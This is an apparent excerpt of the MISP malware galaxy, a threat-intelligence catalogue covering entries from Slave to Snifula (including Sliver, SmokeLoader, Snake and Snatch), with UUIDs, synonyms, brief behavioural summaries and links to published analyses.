in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Slave
Internal MISP references
UUID 1f4d8d42-8f31-47f8-b2b7-2d43196de532
which can be used as unique global reference for Slave
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SLICKSHOES
Internal MISP references
UUID a82f80fc-71e8-4dee-8a64-e5cbb4100321
which can be used as unique global reference for SLICKSHOES
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Slingshot
- First sighted in 2012
- Attack vector: compromised MikroTik routers; victims are infected when they connect to the router with the MikroTik administration tool, Winbox
- Discovered by the Kaspersky team in 2018
Infection vector: infected MikroTik router > malicious DLL (IP4.dll) on the router > user connects via Winbox > malicious DLL downloaded onto the computer
Internal MISP references
UUID d6178858-1244-41cf-aeed-8c6afc1d6846
which can be used as unique global reference for Slingshot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot - webarchive
- https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/ - webarchive
- https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/ - webarchive
- https://securelist.com/apt-slingshot/84312/ - webarchive
- https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sliver
According to VK9 Security, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.
Internal MISP references
UUID 654c478e-3c9a-4fd9-a9b7-dd6839f51147
which can be used as unique global reference for Sliver
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver - webarchive
- https://asec.ahnlab.com/en/55652/ - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks - webarchive
- https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/ - webarchive
- https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/ - webarchive
- https://github.com/chronicle/GCTI - webarchive
- https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/ - webarchive
- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/ - webarchive
- https://asec.ahnlab.com/en/56941/ - webarchive
- https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools - webarchive
- https://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://www.telsy.com/download/5900/?uid=b797afdcfb - webarchive
- https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/ - webarchive
- https://asec.ahnlab.com/en/47088/ - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition - webarchive
- https://github.com/BishopFox/sliver - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://hunt.io/blog/sliver-c2-ligolo-ng-targeting-yc - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
slnrat
Internal MISP references
UUID 68bb36d3-d078-483d-b559-e0d8da5f45fe
which can be used as unique global reference for slnrat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SlothfulMedia
According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SlothfulMedia.
Known Synonyms |
---|
QueenOfClubs |
Internal MISP references
UUID f23d70bc-7de6-49bd-bb69-82518b4d7fca
which can be used as unique global reference for SlothfulMedia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SLUB
Internal MISP references
UUID 1bc01fca-9a1e-4669-bd9d-8dd29416f9c1
which can be used as unique global reference for SLUB
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.slub - webarchive
- https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/ - webarchive
- https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
smac
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular smac.
Known Synonyms |
---|
speccom |
Internal MISP references
UUID a8561caf-eb9f-4a02-8277-a898a0a259ae
which can be used as unique global reference for smac
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.smac - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Smackdown
Internal MISP references
UUID 427dcec9-e2b9-44ad-bf58-281b7ba971bb
which can be used as unique global reference for Smackdown
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SManager
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SManager.
Known Synonyms |
---|
PhantomNet |
Internal MISP references
UUID 1a6a6e4c-3e0e-422b-9840-9c6286dc7b17
which can be used as unique global reference for SManager
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager - webarchive
- https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html - webarchive
- https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set - webarchive
- https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager - webarchive
- https://blog.group-ib.com/task - webarchive
- https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html - webarchive
- https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/ - webarchive
- https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214 - webarchive
- https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html - webarchive
- https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/ - webarchive
- https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4 - webarchive
- https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SmartEyes
Internal MISP references
UUID 67723f6e-822b-475a-938b-c9114b9aefea
which can be used as unique global reference for SmartEyes
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SmartLoader
Internal MISP references
UUID af011dc6-e8a3-4a06-9fb8-42045cea92c5
which can be used as unique global reference for SmartLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SMAUG
According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.
Internal MISP references
UUID b81cbf03-8909-4833-badf-4df32c9bf6cb
which can be used as unique global reference for SMAUG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug - webarchive
- https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/ - webarchive
- https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SMOKEDHAM
According to Mandiant, SMOKEDHAM is dropped through a PowerShell script that contains the (C#) source code for this backdoor, which is stored in an encrypted variable. The dropper dynamically defines a cmdlet and .NET class for the backdoor, meaning the compiled code is only found in memory.
Internal MISP references
UUID 7547af7d-e4fe-4ee1-8a3d-55981740b78c
which can be used as unique global reference for SMOKEDHAM
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham - webarchive
- https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise - webarchive
- https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html - webarchive
- https://www.mandiant.com/resources/burrowing-your-way-into-vpns - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SmokeLoader
The SmokeLoader family is a generic backdoor with a range of capabilities that depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. It frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still carries data in the response body.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SmokeLoader.
Known Synonyms |
---|
Dofoil |
Sharik |
Smoke |
Smoke Loader |
Internal MISP references
UUID ba91d713-c36e-4d98-9fb7-e16496a69eec
which can be used as unique global reference for SmokeLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader - webarchive
- https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/ - webarchive
- https://irfan-eternal.github.io/understanding-internals-of-smokeloader/ - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://www.silentpush.com/blog/privacy-tools-not-for-you - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html - webarchive
- https://asec.ahnlab.com/en/36634/ - webarchive
- https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/october/The%20Surge%20in%20Smokeloader%20Attacks%20on%20Ukrainian%20Institutions%20UA.pdf - webarchive
- https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/ - webarchive
- https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/ - webarchive
- https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/ - webarchive
- https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html - webarchive
- https://www.zscaler.com/blogs/security-research/brief-history-smokeloader-part-1 - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/ - webarchive
- https://youtu.be/QOypldw6hnY?t=3237 - webarchive
- https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/ - webarchive
- https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view - webarchive
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/ - webarchive
- https://hatching.io/blog/tt-2020-08-27/ - webarchive
- http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/ - webarchive
- https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html - webarchive
- https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign - webarchive
- https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/ - webarchive
- https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/ - webarchive
- https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis - webarchive
- https://farghlymal.github.io/SmokeLoader-Analysis/ - webarchive
- https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/ - webarchive
- https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/ - webarchive
- https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/ - webarchive
- https://suvaditya.one/malware-analysis/smokeloader/ - webarchive
- https://scpc.gov.ua/api/files/8e300d33-6257-4d7f-8f72-457224268343 - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://infosec.exchange/@spamhaus/112008862430254522 - webarchive
- https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US - webarchive
- http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer - webarchive
- https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/ - webarchive
- https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/ - webarchive
- https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://asec.ahnlab.com/en/33600/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/ - webarchive
- https://www.cert.pl/en/news/single/dissecting-smoke-loader/ - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://m.alvar.es/2020/06/unpacking-smokeloader-and.html - webarchive
- https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html - webarchive
- https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe - webarchive
- https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities - webarchive
- https://unit42.paloaltonetworks.com/analysis-of-smoke-loader-in-new-tsunami-campaign/ - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/ - webarchive
- https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer - webarchive
- https://insights.loaderinsight.agency/posts/vidar-build-id-correlation/ - webarchive
- https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft - webarchive
- https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html - webarchive
- https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886 - webarchive
- https://embee-research.ghost.io/smokeloader-analysis-with-procmon/ - webarchive
- https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise - webarchive
- https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore - webarchive
- https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd - webarchive
- https://x0r19x91.in/malware-analysis/smokeloader/ - webarchive
- http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html - webarchive
- https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem - webarchive
- https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Smominru
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Smominru.
Known Synonyms |
---|
Ismo |
Internal MISP references
UUID 26b91007-a8ae-4e32-bd99-292e44735c3d
which can be used as unique global reference for Smominru
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Smrss32
Ransomware.
Internal MISP references
UUID 1fe0b2fe-5f9b-4359-b362-be611537442a
which can be used as unique global reference for Smrss32
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sn0wsLogger
Internal MISP references
UUID 17c6c227-5c9b-40eb-886b-19e2b137c5e8
which can be used as unique global reference for Sn0wsLogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Snake
Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5-character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snake.
Known Synonyms |
---|
EKANS |
SNAKEHOSE |
Internal MISP references
UUID 547deef9-67c3-483e-933d-171ee8b6b918
which can be used as unique global reference for Snake
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.snake - webarchive
- https://twitter.com/milkr3am/status/1270019326976786432 - webarchive
- https://twitter.com/bad_packets/status/1270957214300135426 - webarchive
- https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017 - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md - webarchive
- https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/ - webarchive
- https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ - webarchive
- https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/ - webarchive
- https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/ - webarchive
- https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/ - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://www.goggleheadedhacker.com/blog/post/22 - webarchive
- https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/ - webarchive
- https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/ - webarchive
- https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems - webarchive
- https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Snatch
Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode, so the malware can act without the expected countermeasures and encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.
Internal MISP references
UUID 98139439-6863-439c-b4d0-c6893f1afb23
which can be used as unique global reference for Snatch
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch - webarchive
- https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://thedfirreport.com/2020/06/21/snatch-ransomware/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://twitter.com/VK_Intel/status/1191414501297528832 - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/ - webarchive
- https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SnatchCrypto
Malware observed in the SnatchCrypto campaign, attributed by Kaspersky Labs to BlueNoroff with high confidence.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SnatchCrypto.
Known Synonyms |
---|
BackbitingTea |
Internal MISP references
UUID b7affd90-6551-4266-b864-a0b9f6d5b309
which can be used as unique global reference for SnatchCrypto
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto - webarchive
- https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/ - webarchive
- https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/ - webarchive
- https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
- https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SnatchLoader
A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.
Internal MISP references
UUID 467c726e-6e19-4d15-88b6-362cbe0b3d20
which can be used as unique global reference for SnatchLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader - webarchive
- https://www.youtube.com/watch?v=k3sM88o_maM - webarchive
- https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/ - webarchive
- https://twitter.com/VK_Intel/status/898549340121288704 - webarchive
- https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/ - webarchive
- https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SNEEPY
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SNEEPY.
Known Synonyms |
---|
ByeByeShell |
Internal MISP references
UUID 212d1ed7-0519-412b-a1ce-56046ca93372
which can be used as unique global reference for SNEEPY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Snifula
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snifula.
Known Synonyms |
---|
Ursnif |
Internal MISP references
UUID 4f3ad937-bf2f-40cb-9695-a2bedfd41bfa
which can be used as unique global reference for Snifula
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula - webarchive
- https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072 - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/ - webarchive
- https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf - webarchive
- https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html - webarchive
- https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/ - webarchive
